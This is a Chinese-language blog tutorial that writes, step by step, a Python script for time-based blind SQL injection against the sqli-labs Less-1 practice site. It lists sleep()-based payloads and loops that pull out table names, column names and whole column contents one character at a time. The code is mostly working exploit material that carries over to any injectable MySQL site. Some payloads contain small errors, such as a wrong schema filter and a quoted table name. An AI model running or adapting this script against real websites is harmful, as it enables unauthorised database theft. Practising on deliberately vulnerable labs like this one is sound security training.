python实现自动化延迟注入-时间盲注脚本-源代码

在做手工的sql时间注入时，他需要一个字符一个字符的去猜，如果手动的去一个尝试，会浪费大量的时间，所以当时也就是了解他的原理后就没有试过了，这次尝试用python实现时间盲注。

靶场：sqlilab的第一关

python包：time、request

下面开始编写：

1、首先我们先写出时间盲注的基础架构

?id=1' and if (A, sleep(3), sleep(0)) --+

如果A语句为真，则页面加载延迟3秒；如果为假，没有延迟。

作为参考我们先提前把数据库信息读取出来，如下：

 表名：emails,referers,uagents,users 

 2、手工的poyload是：

http://192.168.162.135/sqlilab/Less-1/?id=1' and if ( substr((select group_concat(table_name) from information_schema.tables where table_schema = schema()),1,1)  = 'e', sleep(3) , sleep(0))   --+

我们在python中编写如下代码：

chr()函数是python里用来将ascill码转为字符的函数；

dur = 2     #延迟时间
for v in range(1,100):      #假设他由所有表名长度加起来有100，因此要猜解循环100次
    for i in range(32,127): #根据ascill码进行循环，从32-126
        start = time.time()     #起始时间
        fg=requests.get(f"http://192.168.162.135/sqlilab/Less-1/?id=1' and if (substr((select group_concat(table_name) "
                        f"from information_schema.tables where table_schema = schema()),{v},1) = '{chr(i)}', "
                        f"sleep({dur}) , sleep(0)) --+ ")
        end = time.time()-start     #poyload提交后花费的时间
        if end > dur:   #如果发生延迟，猜解正确，输出该字符串
            print(f'{chr(i)}',end='')
            break       #用于跳出猜字符串的这个循环，进行第二个字符串的猜解

运行后，读取出了数据库中的表：

但由于循环次数设置的太多，表名其实并没有那么长，因此，我们在猜表名之前先确定表明的长度；这里所有的表为大写是因为MySQL数据库大小写都可以识别，不影响。

3、接下来进行改进，首先我们写一个函数用于确定是否发生时间延迟；

def req(urls):
    start = time.time()  # 起始时间
    fg = requests.get(url=urls)
    end = time.time() - start  # poyload提交后花费的时间
    if end > dur:  # 如果发生延迟，返回True，否则返回False
        return True
    else:
        return False

4、然后我们编写判断表长度的部分

 手工的poyload是：

http://192.168.162.135/sqlilab/Less-1/?id=1' and if ( length((select group_concat(table_name) from information_schema.tables where table_schema = schema()))  = 10, sleep(3) , sleep(0))   --+

根据这个我们编写代码：

#进行表名长度的确定
for i in range(1,300):
    fg = req(f"http://192.168.162.135/sqlilab/Less-1/?id=1' and if ( length((select group_concat(table_name) from "
             f"information_schema.tables where table_schema = schema()))  = {i}, sleep({dur}) , sleep(0))   --+")
    if fg:
        print(f'表的长度是：{i}')
        length_table = i
        break

 

 5、获得表的长度，接下来猜表名的时候只需要循环29次

重改获取表名的代码：

#进行表名的猜解
tmp = ''
for v in range(1, length_table + 1):
    for i in range(32,127): #根据ascill码进行循环，从32-126
        fg=req(f"http://192.168.162.135/sqlilab/Less-1/?id=1' and if (substr((select group_concat(table_name) "
                        f"from information_schema.tables where table_schema = schema()),{v},1) = '{chr(i)}', "
                        f"sleep({dur}) , sleep(0)) --+ ")
        if fg:
            tmp += chr(i)
            break
print(f'表名：{tmp}')

 运行结果：

5、接下来是猜解列名，因此我们要指定表名；现在表名是以字符串的形式存在，因此用列表存放，等会用下标来指定表名。还是分两步，先确定列的长度，再确定列名

（1）、列的长度

poyload：

http://192.168.162.135/sqlilab/Less-1/?id=1' and if ( length((select group_concat(column_name) from information_schema.columns where table_schema = 'users'))  = 10, sleep(3) , sleep(0))   --+

代码如下：

#1、判断列的长度
tables = []     #用于存放表名
tables = tmp.split(',')
ind = 0         #用于指定表名
for x in tables:
    print(f'{ind}:{x}')
    ind += 1
tb = int(input('请选择要爆破的表'))

for i in range(1,300):
    fg = req(f"http://192.168.162.135/sqlilab/Less-1/?id=1' and if ( length((select group_concat(column_name) from "
             f"information_schema.columns where table_name = '{tables[tb]}'))  = {i}, sleep({dur}) , sleep(0))   --+")
    if fg:
        print(f'{tables[tb]}的列的长度是：{i}')
        length_column = i
        break

运行结果：

（2）、猜解列名

poyload：

http://192.168.162.135/sqlilab/Less-1/?id=1' and if ( substr((select group_concat(column_name) from information_schema.columns where table_schema = 'users'),1,1)  = 'i', sleep(3) , sleep(0))   --+

代码如下：

#2、猜解列名
tmp_column = ''
for v in range(1, length_column + 1):
    for i in range(32,127): #根据ascill码进行循环，从32-126
        fg=req(f"http://192.168.162.135/sqlilab/Less-1/?id=1' and if (substr((select group_concat(column_name) "
                        f"from information_schema.columns where table_name = '{tables[tb]}'),{v},1) = '{chr(i)}', "
                        f"sleep({dur}) , sleep(0)) --+ ")
        if fg:
            tmp_column += chr(i)
            break
print(f'{tables[tb]}的列名：{tmp_column}')

运行结果： 

6、指定列名，猜解该列的所有内容

代码如下：

#指定列名，获取数据
#1、判断该列所有内容的长度
tables_column = []     #用于存放表名
tables_column = tmp_column.split(',')
ind = 0         #用于指定表名
for x in tables_column:
    print(f'{ind}:{x}')
    ind += 1
ts = int(input('请选择要爆破的列名'))
for i in range(1,10000):
    fg = req(f"http://192.168.162.135/sqlilab/Less-1/?id=1' and if ( length((select group_concat({tables_column[ts]}) from '{tables[tb]}'))  = {i}, sleep({dur}) , sleep(0)) --+")
    if fg:
        print(f'{tables[tb]}的{tables_column[ts]}列的所有内容长度是：{i}')
        length_content = i
        break

#2、获取该列的所有内容
tmp_content = ''
for v in range(1, length_content + 1):
    for i in range(32,127): #根据ascill码进行循环，从32-126
        fg=req(f"http://192.168.162.135/sqlilab/Less-1/?id=1' and if ( substr((select group_concat"
               f"({tables_column[ts]}) from '{tables[tb]}'),{v},1)  = '{chr(i)}', sleep({dur}) , sleep(0)) --+")
        if fg:
            tmp_content += chr(i)
            break
print(f'{tables[tb]}表的{tables_column[ts]}列的内容')
tables_content = []     #存放列的内容
tables_content = tmp_content.split(',')
for n in tables_content:
    print(n)

到此，整个项目编写完成！！！

欢迎大佬们的指正。